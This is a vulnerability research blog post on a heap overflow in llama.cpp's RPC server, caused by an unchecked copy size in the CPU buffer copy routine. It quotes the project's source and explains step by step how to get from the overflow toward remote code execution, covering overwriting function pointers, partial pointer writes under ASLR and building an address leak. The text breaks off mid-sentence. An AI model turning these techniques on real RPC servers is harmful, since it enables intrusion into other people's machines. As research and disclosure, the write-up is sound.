Llama's Paradox - Delving deep into Llama.cpp and exploiting Llama.cpp's Heap Maze, from Heap-Overflow to Remote-Code Execution.
By
February 6, 2025
If you are an exploitation enthusiast, this write-up will be a perfect source of entertainment. I spent ~
30h
on exploiting the heap-overflow to remote-code execution. At the same time, I had already spent around2 weeks
prior researching/understandingLlama.cpp
source regarding its very own RPC & Memory implementations. SinceLlama.cpp
has such a special heap-management system, special features of this system will fail the classicptmalloc
exploitations that we are familiar with. Thus, even though this is a heap-overflow, the exploitation won't be the classicptmalloc
heap-exploitations, rather interesting vectors exploitingLlama.cpp
's implementations logic. Enjoy reading:)
Llama.cpp
is always something I would love to work on, a sort of 'ultimate' goal for my AI/ML
research; not only that but finding a stack/heap-overflow RCE in this sophisticated and well-developed ML Project always sounds so cool. (Besides, I am so hungry for a binary-exp in AI
Projects to prove my binary-exploitation things are not 'outdated', but that's another thing ) Thus, I decided to research on Llama.cpp
's RPC
components, when I saw these security adversaries posted on its GitHub 'Security' tab - I was like: Wow, these are just simple write-what-wheres and read-what-wheres; this must be a 'money' project to work on with a little bit of efforts required.
Then Llama.cpp
proved me very wrong. I found nothing in the first two weeks, as they implemented tons of security checks on RPC
Tensor
deserializations, fully allocated memory 'buffer'
tracing, and implementations of the RPC
endpoints. These write-what-wheres were patched strictly so that when you try to exploit again, you might trigger two assert errors on the way, integer overflow was checked everywhere, you can't mess with the pointers anymore in anyways. It is very secure and not exploitable - devastating it's, I do gain a better understanding of the implementation itself and cpp
(I never systematically learn cpp
) - Llama.cpp
have its very own memory-management system, memory security patches and mitigations, you will see what I am talking about in most parts of this write-up, we will be dealing with different paradox, mitigation, entirely new methodology and exploitation vectors that I never though up before this such unique exploitation. Finally, everything is just chained together, and you will see what a unique exploitation script and process is, as well as the satisfaction of bypassing everything and not giving up on the process.
For this 10k-word write-up, I spent around a month finishing up the main parts, and refining/editing it took an extra while. Writing this is indeed a painful process. I spent the entire day on the weekend and 4-5 hours during the rest of the week working on it for around two weeks. But on the other hand, it is a joyful process of exploring memory things step-by-step. Who doesn't like it? Enjoy reading!
Before the Storm
The story begins at Llama.cpp
's RPC
functions, for the past few months, Llama.cpp
's RPC
Server had been a focus of exploitation. rpc-server
in llama.cpp
enables the execution of the GGML
backend on a remote host, allowing for distributed large language model (LLM) inference. By offloading computations to one or more rpc-server
instances, users can leverage the processing power of multiple machines or specialized hardware, such as GPUs, to enhance performance.
At the very beginning of the development stage of the RPC
server, low-level memory security vulnerabilities were reported (GHSA-wcr5-566p-9cwj
, GHSA-5vm9-p64x-gqw9j
, GHSA-mqp6-7pv6-fqj
), mostly exploited on Llama.cpp
's tensor
memory-related operations. These early-stage vulnerabilities are straightforward exploits that depend less on GGML's RPC memory management logic and more on input considerations. However, we should understand a bit about its memory management process;
Llama.cpp
implements its own mechanism for memory management, based on glibc basic malloc and the classic ptmalloc management methods; meanwhile, added features to the manage-process to optimize Tensor
related processing operations.
To begin with, all memory-related operations require a RPC
allocated memory via the alloc_buffer
command. The RPC
endpoint for it requires only a parameter of size. However, this is a bit more complex than simply returning the malloc-ed pointer address. Instead, the address of a buffer
structure, allocated additionally, with the actual malloc
-ed region wrapped as buffer->data
with be returned; At the meantime, Llama.cpp
's RPC
parse request in the format of Tensor
, not only as a form of payload for these
Prerequisites: Tensor
, buffer
structure
// ggml/src/ggml-backend-impl.h:60
struct ggml_backend_buffer {
struct ggml_backend_buffer_i iface;
ggml_backend_buffer_type_t buft;
void * context;
size_t size;
enum ggml_backend_buffer_usage usage;
};
The buffer
structure consists of the buffer
methods/pointers structure ggml_backend_buffer_i iface
, backend management thread ggml_backend_buffer_type_t buft;
the actual address of allocated memory context
, the size_t size;
of the allocated memory, lastly the ggml_backend_buffer_usage usage
; The interesting part here is the iface
structure, a part that we will embrace a lot, and take a much deeper analysis during the exploitation steps.
struct ggml_backend_buffer_i {
void (*free_buffer) (ggml_backend_buffer_t buffer);
void * (*get_base) (ggml_backend_buffer_t buffer);
void (*init_tensor) (ggml_backend_buffer_t buffer, struct ggml_tensor * tensor);
void (*memset_tensor)(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, uint8_t value, size_t offset, size_t size);
void (*set_tensor) (ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, const void * data, size_t offset, size_t size);
void (*get_tensor) (ggml_backend_buffer_t buffer, const struct ggml_tensor * tensor, void * data, size_t offset, size_t size);
bool (*cpy_tensor) (ggml_backend_buffer_t buffer, const struct ggml_tensor * src, struct ggml_tensor * dst);
void (*clear) (ggml_backend_buffer_t buffer, uint8_t value);
void (*reset) (ggml_backend_buffer_t buffer);
};
Llama.cpp
's multi-architectural made it necessary to assign different methods according to the targeted server architecture; for instance machines with only CPU support's iface.get_tensor
will be set to ggml_backend_cpu_buffer_get_tensor
, while CUDA supported server will enable ggml_backend_cuda_buffer_get_tensor
. These methods, different in architecture have identical implementation, however, with different compatibility variations (For instance, CUDA machine uses cudaMemcpyAsync
, on the other hand CPU versions use the native memcpy
from the C-Standard-Library).
struct ggml_tensor {
enum ggml_type type;
GGML_DEPRECATED(enum ggml_backend_type backend, "use the buffer type to find the storage location of the tensor");
struct ggml_backend_buffer * buffer;
int64_t ne[GGML_MAX_DIMS]; // number of elements
size_t nb[GGML_MAX_DIMS]; // stride in bytes:
// compute data
enum ggml_op op;
// op params - allocated as int32_t for alignment
int32_t op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
int32_t flags;
struct ggml_tensor * src[GGML_MAX_SRC];
// source tensor and offset for views
struct ggml_tensor * view_src;
size_t view_offs;
void * data;
char name[GGML_MAX_NAME];
void * extra; // extra things e.g., for ggml-cuda.cu
char padding[8];
};
Tensor
is used everywhere in llama.cpp
. Here yet we won't delve in to the technical details of int64_t ne[GGML_MAX_DIMS];
/ size_t nb[GGML_MAX_DIMS];
and how it stores tensors's shapes and strides. Additionally to tensor data transportations, the Tensor
structure in llama.cpp
provides a serialization standard for the RPC
communications, combined with previous introductions to the buffer
structure, lets take a looking in an instance how the memory-allocation-endpoints communicates, using buffer
and Tensor
.
Past Patches, Mitigation
The three reported adversaries we mentioned previously (GHSA-wcr5-566p-9cwj
, GHSA-5vm9-p64x-gqw9j
, GHSA-mqp6-7pv6-fqj
) are actually exploitations that are exploiting a fundamental, essence of flaw of design - the lack of boundary checks on the buffer
/ buffer->data
pointer. The existence of this flaw in applied different features of RPC
server - whether the get_tensor
or the set_tensor
allowed attackers to achieve read-what-wheres or write-what-where.
static void ggml_backend_cpu_buffer_set_tensor(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor, const void * data, size_t offset, size_t size) {
memcpy((char *)tensor->data + offset, data, size);
// write-what-wheres, past version of Llama.cpp's RPC had no sanitization on buffer->data validty, sadly you can just write-what-where
GGML_UNUSED(buffer);
}
However, these memory problems were solved by implementing tons of glibc
level memory-checks of the buffer
structure - there's time that a pointer or Tensor
size will be check twice, or even more; These mitigations are implemented before deserialization of a tensor (deserialize_tensor()
), RPC
method call-wrappers (e.g rpc_server::set_tensor
), call-wrappers's internal implementations (e.g. ggml_backend_tensor_set
), and even in the buffer->iface
implementations (e.g ggml_backend_cpu_buffer_cpy_tensor
), these four stage of checks made you aware of the pointer validation according to every-steps of the RPC
processing (Fun fact, at the very beginning of the research I spent around 3-5 hours just to figurer out how the tensor checks works so I can try the past exploitation, to see if they fixed it properly, and they did).
Looking into these mitigation, going to step-by-step, the first check a remote Tensor
will face is the check at deserialize_tensor()
, where the tensor->data
pointer, used mainly in get_tensor
and set_tensor
is checked whether inside of the ggml_backend_buffer_get_base
to ggml_backend_buffer_get_size
range or not, while it also consider exploitations where tensor_size
is possibly negative, which can results backward writes/reads in set/get_tensor
method. At the meantime, ggml_backend_buffer_get_base
, ggml_backend_buffer_get_size
; wrapper for tensor->context
and tensor->size
, made bypassing the mitigation not-easy or we will need to forge a buffer
structure, with valid buffer
internal pointers.
// ggml/src/ggml-rpc/ggml-rpc.cpp:848
if (result->buffer) {
// require that the tensor data does not go beyond the buffer end
uint64_t tensor_size = (uint64_t) ggml_nbytes(result);
uint64_t buffer_start = (uint64_t) ggml_backend_buffer_get_base(result->buffer);
uint64_t buffer_size = (uint64_t) ggml_backend_buffer_get_size(result->buffer);
GGML_ASSERT(tensor->data + tensor_size >= tensor->data); // check for overflow
GGML_ASSERT(tensor->data >= buffer_start && tensor->data + tensor_size <= buffer_start + buffer_size);
}
Mentioning here the
buffer
pointer's validity were also checked inggml/src/ggml-rpc/ggml-rpc.cpp:843 (deserialize_tensor())
->result->buffer && buffers.find(result->buffer) == buffers.end()
, by examining the globalbuffer
management arraybuffers
, this prevents any pre-forgedbuffer
structure exploitations
request.tensor.data
/ (buffer->data
) validity, with request.offset
/ request.size
are checked furthermore in the call-wrapper implementations, here the sanitization is similar to the previous ones using ggml_backend_buffer_get_base
, ggml_backend_buffer_get_size
(we might refer this to p0
p1
in the future), however, with included the offset
/ size
which is a part of the RPC
passed parameter, these can change the range of the final get_tensor
/ set_tensor
thus checked together with the buffer->data
. Interestingly here also checked if request.tensor.data + request.offset
is negative to prevent backwards write/read. While prevented out-of-bounds read/write via request.size
.
// ggml/src/ggml-rpc/ggml-rpc.cpp:924
{
const size_t p0 = (size_t) ggml_backend_buffer_get_base(tensor->buffer);
const size_t p1 = p0 + ggml_backend_buffer_get_size(tensor->buffer);
if (request.tensor.data + request.offset < p0 ||
request.tensor.data + request.offset >= p1 ||
request.size > (p1 - request.tensor.data - request.offset)) {
GGML_ABORT("[%s] tensor->data out of bounds\n", __func__);
}
}
Lastly, some buffer->iface
implementation also implemented checks. For instance, ggml_backend_cpu_buffer_cpy_tensor
checked (ggml_backend_buffer_is_host(src->buffer)) {
to make sure that the validity of src->buffer
. This is a fully considered sanitization since one possible exploitation I considered is manually leaving src->buffer
to NULL
, which will fail the p0/p1
checks on the src->data
checks (since buffer
is a NULL
pointer, internal processing of ggml_backend_buffer_get_base
will skip tests and return 0
), potentially allowing us to leak arbitrary address. It is very exploitable, and this is a part of their considerations.
Analysis: Dimensions to Destruction, cpy_tensor
, and ggml_nbytes
Despite the buffer->data
pointer being sanitized in every possible way, the get_base()
(buffer->context
) and buffer->size
are being examined in such scary ways. However, we still found an interesting heap-overflow vector hidden in the jungle of ggml_backend_cpu
method during the research process.
The exploitation starts with an interesting method: ggml_nbytes
, a technique for calculating the dimension size of Tensor objects.
size_t ggml_nbytes(const struct ggml_tensor * tensor) {
size_t nbytes;
const size_t blck_size = ggml_blck_size(tensor->type);
if (blck_size == 1) {
nbytes = ggml_type_size(tensor->type);
for (int i = 0; i < GGML_MAX_DIMS; ++i) {
nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
}
}
else {
nbytes = tensor->ne[0]*tensor->nb[0]/blck_size;
for (int i = 1; i < GGML_MAX_DIMS; ++i) {
nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
}
}
return nbytes;
}
int64_t ggml_blck_size(enum ggml_type type) {
return type_traits[type].blck_size;
}
static const struct ggml_type_traits type_traits[GGML_TYPE_COUNT] = {
[GGML_TYPE_I8] = {
.type_name = "i8",
.blck_size = 1,
.type_size = sizeof(int8_t),
.is_quantized = false,
},
// ....
ggml_nbytes()
is a method that is often loaded by llama.cpp
as in the libggml-base.so
(ggml.c
) to calculate the data size of a Tensor
(A tensor is a multi-dimensional data structure commonly used in machine learning and numerical computing) based on a Tensor
's shape tensor->ne[]
and stride tensor->nb[]
.
The ggml_blck_size
gets its corresponded blck_size
via method ggml_blck_size
, a wrapper for the global variable type_traits
(Interestingly, past vulnerabilities were identified in ggml_blck_size
when type
of the ggml_tensor
wasn't limited/sanitized, this allowed out-of-bounds reads based on the type_traits
global variable, until they introduced size limitation on Tensor->type
); These .blck_size
does not increase linearly, instead, dependent on the properties of GGML_TYPE_X
itself.
The interesting part here is the nbytes
, size of the Tensor
is calculated and determined by the tensor->ne[i]
array, tensor->nb[0]
, and the tensor->type
(being converted into blck_size
using ggml_blck_size
), meaning that, if the Tensor
's (ne[] || nb[])
is controlled, the returned nbytes
will be controlled (to delve deeper in the exploitation part regarding the calculation of ggml_nbytes
, we will not explain how the size is calculated right now). This won't really be a problem at in llama.cpp
's general usage of ggml_nbytes
, since GGML Tensors
typically have practical limits on their dimensions due to memory constraints. However, this does become a start of the storm at one of GGML
's backend dynamic iface
binding method, ggml_backend_cpu_buffer_cpy_tensor
.
static bool ggml_backend_cpu_buffer_cpy_tensor(ggml_backend_buffer_t buffer, const struct ggml_tensor * src, struct ggml_tensor * dst) {
if (ggml_backend_buffer_is_host(src->buffer)) {
memcpy(dst->data, src->data, ggml_nbytes(src));
return true;
}
return false;
GGML_UNUSED(buffer);
}
This seems like a proper functioning and secure buffer->iface
implementation (might seemed more innocent if I don't put it in context of a exploitation blog and just introduced ggml_nbytes
in a exploitation blog), regarding all the 3-level checks llama.cpp
implemented, these checks stop us from any sort of way to mess with the buffer->data
pointer or the passed offset
/ size
. Mentioning that the small check on ggml_backend_buffer_is_host
, nothing really to exploit on the cpy
functionality of it.
However, notice we that the size of memcpy
is calculated by the Tensor
dimensional size of src
, using the ggml_nbytes
, and you will starting to see the problem. You see, despite ggml-rpc.cpp:854
's ggml_nbytes
checks regarding the uint64_t tensor_size = (uint64_t) ggml_nbytes(result)
with tensor->data
and buffer_start
. However, these only check whether the out-of-bounds happen within the buffer->context.
In case of copying one src->data
to another context
, dst->data
, ggml_nbytes
calculations are manipulated by input-controllable Tensor
member ne[]
/ nb[]
, which will be copied precisely during deserialize_tensor()
, and this iface
implementation did not compare for the ggml_nbytes
size between the src
and dst
Tensor
, this allowed us to construct a 'larger' Tensor
as dst
, specified a large dimension size for the 'smaller' src
(For large and small we regard the actual applied size), this will result overlapping of src
's data to the dst
, leading to heap overflow.
In the meantime, the controllable of src->context also guaranteed the exploitability of this vulnerability; we can previously set src->context using set_tensor to fill src->context with payload and overflow based on dst->context
.
The Storm: Exploiting the World of Paradox.
Finding the heap-overflow is a great thing, but getting to exploit a heap-overflow is even better, usually the crash files from a heap-overflow
/ asan
is sufficient enough to submit as a heap-overflow
, but what's the fun of that. But on the other hand, exploiting this heap-overflow in a unique and sophisticated memory-management system does drag us into this storm, and the World of Paradox.
The whole exploitation part was written with the process of the research, meaning that part of it was written before the vulnerability was proved exploitable (which also made it very enjoyable to read). I recommends reading till the end, things and things get more interesting
Setting a breakpoint at the room where it happened, here's what my first thought goes, taking a look into dst->data
, we will find that this structure is highly close to the buffer
structure:
In this case, the closest buffer
structure is at 0x55555557dd10-0x55555557dc00
, only 0x110
to the overflown dst->data
. Such a "coincidence" in the arrangement of chunks made us very happy! Why? You might have asked, this will need us to take a look back at ggml/src/ggml-rpc/ggml-rpc.cpp
; this is what happens when a request is parsed into the RPC Server, using get_tensor
operation as an example:
Enters
static void rpc_serve_client(ggml_backend_t backend, sockfd_t sockfd, size_t free_mem, size_t total_mem) {
, where the RPC Server listen for socket connectionsEnter specific case switch as what the
p8()
command indicates; in this case, it will entercase RPC_CMD_GET_TENSOR:
Then into
server.set_tensor(input)
, therpc_server
type method for handling requests, where here the server deserialize tensors, check for boundaries and sanitation...Eventually, enters a method of
ggml_backend_*
(in this caseggml_backend_tensor_set
), this method is located in theggml-backend.cpp
file, where the actual operations regarding tensors happen.Inside of the
ggml_backend_*
file, because different type/architecture of RPC servers, Llama.cpp does not use single-static methods to operate for these tensors; instead, these operation "threads" are assigned on runtime and stored on thebuffer
thread (asbuf->iface
), e.g.tensor_set
operation callsbuf->iface.set_tensor(buf, tensor, data, offset, size);
eventually.
What this means is that if we can control the buffer address (not the context address) via overflowing since they are in such adjacent address, we can control the members of the buffer
structure; for example, by manipulating buffer->iface
, the back-end operation methods. We can redirect the execution flow to an arbitrary address; by manipulating the context
variables, we can bypass existing range checks to re-establish/bypass the mitigation on write-what-where / read-what-where!
For now, our job will be manipulating the heap calculating heap offset between chunks and structure members using cyclic
and flat()
; this is a long process since usually other heap components will be affected during the overflow. The size of overflown need to be calculate carefully or you will overwrite unintentionally, this required you to play with the dimension-size
in both written-tensor
/ overflown-tensor
.
After spending a morning working on the side-effect of the overflow,we can call arbitrary address now! (For some reason, we will corrupt other chunk's header during overflow, causing errors in free()
/ munmap_chunk(): invalid pointer
, fixed by observing the heap structure before/after overflow, you will need to set a chunk's header manually), since we can arrange allocated chunk freely, we can predict the size header of the next chunk if we use the same allocating approach at the same time (while considering the prev_in_use
flag, in this case we write sizeof(buffer)+0x8
to 0x110
)
Paradox-of-Overflow
As I should mentioned before, both deserialize_tensor
or the implementation of the backend method presents strict boundary checks regarding the context
size and tensor->data
ranging after the previous patch. Specifically, the mitigation in deserialize_tensor
checks if the tensor->data
is in range via ggml_backend_buffer_get_base
and ggml_backend_buffer_get_size
( both method depends on the buffer
members buffer->context
and buffer->size
), while implementation checks if the boundary can be corrupted under the influence of request parameters. `` The problem arises here: Exploiting this overflow to a new, hellish level. Even though we can control the execution flow of the RPC server to an arbitrary address, we have zero addresses that we can exploit by manipulating the execution flow. Usually, this will be a easy-to-solve problem, since we already have control over the buffer
structure, we can manipulate buffer
members used in the sanitation process of tensor->data
/ buffer
base, to bypass the previous patches on previous vulnerabilities. However, here the Paradox-of-Overflow came in place:
To bypass
tensor->data
/buffer_base
boundary mitigation, we will have to modify thebuffer
'scontext
/get_base
membersModifying
buffer
will corrupt otherbuffer
member and pointers when we haven't obtained / leaked theggmlbase
base address to calculate the actual address of thesebuffer->iface
ptrs.To leak
ggmlbase
pointers, or theggmlbase
base address, we must external of the legaltensor->data
range, meaning that we must bypass the boundary mitigation, which bought us back to the first step.
Re-mentioning the fact that we hold zero-pointers at the point of the first overflow, the paradox-of-overflow made it impossible to exploit solely depending on buffer
- This= can be a really, really useful vector when we can edit buffer
members such as context
, get_base
with out risking corrupting the entire buffer
(In this, we can bypass anything to leak libc
etc furthermore). But for now, it's best that we leave this vector here and use it when we need it!
Partial-write: partial-write in real life?
In classic glibc
CTF exploitation, there's a technique or a little trick that people know about but are getting less practical nowadays called partial writing. By "partial writing," it means that we are writing parts (sounds like a cliche but needed to reinforce) of the pointers.
For readers who are not familiar with partial-writing, in most systems, pointers are stored as multi-byte values (e.g., 8 bytes on a 64-bit system). These bytes can be broken down into smaller sections, such as the lower 2 bytes (LSB
), the middle bytes, or the higher-order bytes (MSB
), and how they are stored is often counter-intuitive in little-endian architecture, where the MSB
is stored at the larger memory address, while the LSB
is at the lower ones, what this means is that a pointer of 0xdeadbeef
, for example, looks like ef be ad de
in memory.
Binary often requires libraries to run, for the example, the standard-c-library libc
or other self-compiled library, although you can statically compile a binary (embedding the external method / types inside of the binary), but this will result a considerably large ELF. Instead, during runtime, the elf will statically link the library to the elf, and the library will map be mapped into memory segmentation of the program (you can check for the memory mapping using vmmap
in gdb
), and be referenced using ( offset
/ 'real-address' in library + mapping_base
). However, thanks to ASLR
, these base addresses are loaded/mapped randomly, in case the elf did not encapsulate a method for, e.g, executing command and we are seeking RCEs, the only way for us to call for system
is to first, leaked the dynamic-linked library's (usually the libc.so.6
) mapped base-address in the elf, then using the fixed offset in the library to calculate the actual address of the method.
Now, here's where partial-writing becomes particularly interesting. Thanks to the combination of the memory-aligning mechanism in address mapping of dynamic-linked libraries, and little-endian architecture, it enabled an interest vector that allows us to access certain methods in the dynamic-linked library without knowing any mapped base address: partial overflowing the pointer - without corrupting the mapped base, since all base address aligns at 0x1000
, the last-two byte of a dynamic-linked pointer will not be reflected by the loaded aslr-ed base, but straightforwardly represented by the dynamic-linked offset, thus with the power that little-endian gave us, which we are able to modify a pointer at the LSB
part, allowed us to manipulate the pointer to arbitrary-offset of the same base! Even though that we cannot write one-and-half bytes to a pointer, however, it takes maximum value of 0xf = 16
guesses to guarantee validate nibble of the mapped base.
Paradox of Partial-write? Again?
In the case of our exploitation, all buffer->iface
pointers belongs to the libggml-base
dynamic-linked library, sharing the same base (you can observe that all pointers start with 0x7ffff7e7....
) theoretically, we can manipulate them into arbitrary method in compiled in libggml-base.so
. However, taking another closer look, you will find that this is actually a extremely difficult exploitation path since:
Controlling the
ggml_nbytes
is extremely-hard / and time-consuming, because that you can't "calculate" the size. Instead, you will need to change the dimension specification of the tensor, leaving around 40 different combinations.In the best case, I manage to partially overflow the last two bits of the first member -
free_buffer
- it's extremely hard to locate gadgets/function within the range of0xffff
(0x17000 < addr < 0x26fff
translated into offsets within theggmlbase
library)The
free_buffer
is called on a harsh condition, where only thebuffer
is being parsed into the function, eliminating the chances of usingggml_backend_cpu_buffer_get/set_tensor
to manage arbitrary-write / arbitrary-read.
The image above showcased how many methods/gadgets exist in the ggmlbase
library, most of GOTs
you see are outside of the controllable range 0x17000 < addr < 0x26fff
, we can't try to partial overwrite these addresses since controlling more than 0xff
space required too much resources (Since vmmap
base address aligns with 0xfffffffffffffff000
, the last three nibble is fixed despite the base change, we can still predict during 1-digit difference in multi-thread since we will only need to guess 0xf
max).
At first few hours of researching on partial-write, this really seemed like a dead-end, on hand, only iface->free_buffer
is partial-write-able since manipulating with other members might corrupt previous members as we always mentioned (for instance, trying to partially write iface->set_tensor
pointer might corrupt iface->get_tensor
pointer, since it came before iface->set_tensor
as the structure defined). On the other hand, free_buffer
is called right after the cpy_tensor
operation is triggered (meaning that iface->free_buffer
is called immediately after the overflow), while we have a sort of control over the rdi
register, the first parameter of iface->free_buffer
, we still have no-way of leaking any pointers, since even if we manage to leak a pointer via manipulating free_buffer
, we can't receive the leak since rpc_free_buffer
doesn't respond the return via the RPC
connection.
This is such a tricky scenario, to sum up, all these limitations made iface->free_buffer
not-leak-exploitable, while seemed impossible to exploit other buffer->iface
member. In the meantime, without leaking any pointers, the Paradox-Of-Overflow limits us from doing any further exploitations by forging buffer->context
.
But sometimes, changing the perspective, or simply taking another deeper look, at something really small and tiny, may solve the problem
Solving the Paradox: What else can we do when classic ptmalloc
doesn't work?
If you re-examination the obstacles, you will find that actually, every problem is related to iface->free_buffer
, whether it's structural properties or its influence over execution.
iface->free_buffer
is the first element/member in thebuffer->iface
structure.- We can't try to exploit partial-write on any other members of
buffer->iface
, since it will corruptiface->free_buffer
.
- We can't try to exploit partial-write on any other members of
iface->free_buffer
is called implicitly right after the overflow.From
1.1
, corruptingiface->free_buffer
will crash the program.Since it's called implicitly, we can't leak anything since it does not return anything into the data flow (
RPC-Connection
)
This is really the key of exploitation here, as we introduced before in case if the iface->free_buffer
is not called exactly after the partial-writing, we could have partial-write the iface->get_base
pointer for something cool. (Since get_base
can be called remotely with manipulatable argument, and retrievable data).
In the meantime, I spent time researching possible ptmalloc
exploitation vectors, (e.g. large bin attacks
,tcache bin attacks
), all we need is to leak a libc
/ ggml-base
base address, we don't even need to achieve write-what-wheres via in order for us to furthermore exploit.
Unfortunately, llama.cpp
's heap management seemed un-exploitable, special features/mechanisms of the system made the classic ptmalloc
exploitation applicable. Indeed, we can construct overlapping chunks and manage to achieve uaf
s, the buffers
global array and limitation during/after deserialize_tensor
will stop us from operating on not-rpc
-applied chunks, In the meantime, the weird chunk assigning mechanism stops us from going anywhere beyond the tcache bin list
- you can't really fill-up a single tcache bin
size file to try to apply for large bins (then try to leak the pointers of them)
One other weird idea that popped out in my head it trying to out-of-bounds read via the cpy_tensor
sink that we exploited previously (I am sure this is what people tend to think of after struggling for a period of time on how to leak). However, remember the reason that we are achieving possible overflow is the wrongful calculation of the src Tensor
(ggml_nbytes(src)
), and the ggml_nbytes()
is previously implemented with get_base()
, with previously introduced mitigations/patch to present boundary checks on current Tensors
. Which sum-up, indeed allows us to overflow the dst Tensor
; However, we can't really read extra from current Tensor
.
This is really a pain in the butt. If the the classic ptmalloc
, our last resort, have no room to exploit, it seems impossible to exploit and escalate this heap-overflow to anything else than a DoS
. Consider the time spent already on this exploit,
After another extremely-tiring few rounds of looking back into llama.cpp
's source codes (taking lots of time and thought), breaking and rethinking the entire process over and over again. Unexpectedly and lucky, I was able to find a part that we ignored, where the final solution is initiated, by solving simply one minor part of the paradox, the entire paradox unwrapped itself, and achieving RCE
.
NullPointerNoException
void ggml_backend_buffer_free(ggml_backend_buffer_t buffer) {
if (buffer == NULL) {
return;
}
if (buffer->iface.free_buffer != NULL) {
buffer->iface.free_buffer(buffer);
}
delete buffer;
}
This is a code segment snipped from the ggml_backend_buffer_free
method, can be called via rpc
endpoint via rpc_server::free_buffer->ggml_backend_buffer_free
; Additionally called during rpc_server::~rpc_server
, for (auto buffer : buffers) -> ggml_backend_buffer_free
, called after every RPC
connection as the auto-freeing behaviour for every left over buffer
(Also the reason why the iface.free
_buffer
will be right triggered after the overflow, resulting in our Paradox-of-Overflow).
An interesting part, among this very small code segment, before buffer->
iface.free
_buffer(buffer);
is called, the buffer->
iface.free
_buffer
is actually checked if is null
(if the pointer is null) for some reason. This check doesn't really make since the buffer
structure is allocated by the rpc
server. One possible explanation is the ggml_backend_cpu_buffer_from_ptr_i
definition at ggml/src/ggml-backend.cpp:1911
, where the .free_buffer
is set to NULL
. According to the comment, (// ptr is not owned by the buffer, so it does not need to be freed
) where the buffer
is initialized from other buffer
structure (when called/initialized via ggml_backend_cpu_buffer_from_ptr
), thus not require to be freed. This feature didn't raised a lot of attention of at the beginning, as what it seems like, this enabled us is nothing more but avoiding crashing right after the overflow. But what this applied with the partial writing technique with some extra boundary calculation techniques, is fun and explorable.
You might ask why this is interesting, fun, and explorable, this will require us to take a look back into the paradox of partial writing, what it basically is, summarizing is:
Changing free_buffer
will crash the program since we don't know any address.
even if we partial overwrite
free_buffer
, which indeed avoid crash:meaningless other than avoiding crashing, we can't receive any return from the redirected execution flow to break the paradox-of-overflow
we can overwrite anything beyond
free_buffer
What the paradox of partial-writing represents is partial-writing is useless. However, with the help of the new buffer->
iface.free
_buffer != NULL
check this time, what this indirectly means to us is that:
The
iface.free
_buffer
can be set to a known address (NULL
) to avoid crashing;We can modify members that's later to the
iface.free
_buffer
member since writing process ofiface.free
_buffer
will no longer crash the execution flow.
What this furthermore mean is that, this simple, extra examination provided to us the solution / break of the paradox-of-overwriting! Despite the fact that we still hold no libc
/ ggml-base
base addresses, we are able to partial write other buffer->iface
member that have entirely controllable first-parameter register and receivable return, essential factors that make leaking possible, theoretically.
Nevertheless, this doesn't mean that we have an easy exploitation router right after this, we still need to face the problem of finding the proper partial-write target that located around the 0xfff
range of the partial-overwritten method, within the linked ggml-base
library, in which the method allows to leak an entire dynamic-linked loaded pointer address, while we only control over the first-parameter register (this is because only way to receive receivable return is via the RPC
server endpoints to access buffer->iface
method, while these endpoints only deserialize buffer
as the only argument), lastly extreme precise ne[]
/ nb[]
size calculation to return ggml_nbytes()
the right offset/position in order partial-write, which is not easy exploitation at all.
Little head-ups here, even we solve the paradox-of-partial-writing, we still can't solve the paradox-of-overflow by overwriting the
buffer->context
pointer, since it will corruptget_tensor
/set_tensor
method pointers that goes before them, making it invalid/null during the exploitation on thebuffer->context
since it reference the methods from the samebuffer
structure.
However, nothing is impossible; let's see how we can solve the further exploitation piece by piece, layer by layer, and then beautifully construct a leak.
Constructing Leak: Piece by Piece, Layer by Layer
The objective right now is to manage to construct a leak, thanks to previous research, the partial-writing technique seem to be the right way to go, additionally with to the NullPointerNoException exploitation, we are able to target buffer->iface->get_base
as our target of partial overwrite.
The reason why
iface->get_base
gave us more space to exploit, is becauseiface->get_base
can be called viacase RPC_CMD_BUFFER_GET_BASE -> server.buffer_get_base -> ggml_backend_buffer_get_base -> buffer->iface.get_base(buffer);
, while the return value ofggml_backend_buffer_get_base
can be returned asresponse.base_ptr = reinterpret_cast<uint64_t>(base);
directly via theRPC
endpoint, directly leak-able.
However, finding the right manipulation address for buffer->iface->get_base
, as we state previously, we will still have to find the right gadget with in the 0xfff
range, which allows us to leak in case only rdi
register is manipulatable, lastly precise control the ggml_nbtyes()
calculation (I really like to repeat things).
Leak No.1: Right range, Right leak
Note that even though targeting
memset_tensor
/set_tensor
/get_tensor
as target of partial writing is possible. (I did spend a while looking for these that are practical) However, their argument is less controllable (as there is internal processing of the parameters) and for the most important part - don't really return anything, thus considered not the best work-ons on the leaking process
Looking into gdb
, we can see that the pointer for ggml_backend_cpu_buffer_free_buffer
(buffer->iface->get_base
) is located in 0x7ffff7e7b19c
, ggml/src/libggml-base.so
DLL with offset 0x1319c
. As we previously introduced the limitation of partial-writing, our maximum accepted gadget offset with be with in the range of 0x13fff
.
As the call-chain of the invokable get_base
via RPC
endpoint ( following RPC_CMD_BUFFER_GET_BASE -> server.buffer_get_base -> ggml_backend_buffer_get_base -> buffer->iface.get_base(buffer); -> ggml_backend_cpu_buffer_get_base
) With only the request.remote_ptr
(ggml/src/ggml-rpc/ggml-rpc.cpp:804
can be passed into the ggml_backend_buffer_get_base
function as rdi
), we will have to find a method in libggml-base.so
, near the offset 0x1319c
, that takes a address as a parameter, while returns a proper DLL-loaded address.
While regarding the passed-address must be a valid buffer
address (buffer
is examined as if (buffers.find(buffer) == buffers.end()) {
, ggml/src/ggml-rpc/ggml-rpc.cpp:805
, we can't try to pass in arbitrary heap address that we know via alloc_buffer
) and there's less of method that functions to return an address of a pointer, I started to look for getters
in ggml/src/ggml-backend.cpp
, right about 1700 lines near the original definition of ggml_backend_cpu_buffer_get_base
(this does take me more than a while), I find this interesting getter
- ggml_backend_buffer_type_t ggml_backend_buffer_get_type(ggml_backend_buffer_t buffer)
:
ggml_backend_buffer_type_t ggml_backend_buffer_get_type(ggml_backend_buffer_t buffer) {
return buffer->buft;
}
In the first few rounds of researching on ggml/src/ggml-backend.cpp
, chances of the buffer->buft
being a informational leak was ignored since I really looks like the buffer->buft
is just pointing to a mangement-sort-of chunk on the heap. Nevertheless, it was further noticed that buffer->buft
is actually a ggml_backend_buffer_type
type! (ggml_backend_buffer_type_t->ggml_backend_buffer_type
